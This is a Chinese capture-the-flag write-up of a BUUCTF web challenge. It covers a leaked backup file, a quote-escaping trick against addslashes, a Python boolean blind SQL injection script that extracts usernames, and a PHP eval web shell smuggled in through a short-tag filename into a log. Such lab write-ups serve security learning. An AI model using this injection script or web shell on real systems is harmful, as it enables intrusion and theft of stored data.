1. 知识点
- 备份文件泄露
- SQL注入利用
- php短标签
2.感悟
这到题,我就写到SQL注入的地方,成功绕过了单引号的限制用\0
,但是没有往盲注上想。以为是任意文件下载。看完题解,知道了思路应该是bool盲注,语句成功的话,就让id = 1,回显正常,错误的话 id = 0,就什么都没有。 这是我没有想到的,气死我了,应该是可以想到了。
3.实践
3.1 image.php.bak
御剑扫描到robots.txt,打开提示有备份文件,最后找到这个文件,然后下载下来
3.2 SQL注入
对单引号进行了过滤,无法闭合单引号,所以我们用\0
来转义掉它的单引号。输入\0
,经过“addslashes”函数会先变成\\0
,然后经过“str_replace”函数,会变成\
,这样,就把id后面的单引号给转义了。附上SQL注入代码:
import requests
url = "http://d4035b3f-eaac-4675-8c17-e1de75f3d193.node3.buuoj.cn/image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select username from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
l = 1
r = 130
mid = (l + r)>>1
while(l<r):
payloads = payload.format(i,mid)
print(url+payloads)
html = requests.get(url+payloads)
if "JFIF" in html.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result+=chr(mid)
print(result)
3.3 php短标签
因为不允许上传带php的文件名,我们用php短标签来绕过
<?php @eval($_POST['a']);?>
可以用<?=@eval($_POST['a']);?>
来代替。这个文件名,会被写入日志文件中去,然后用菜刀连接。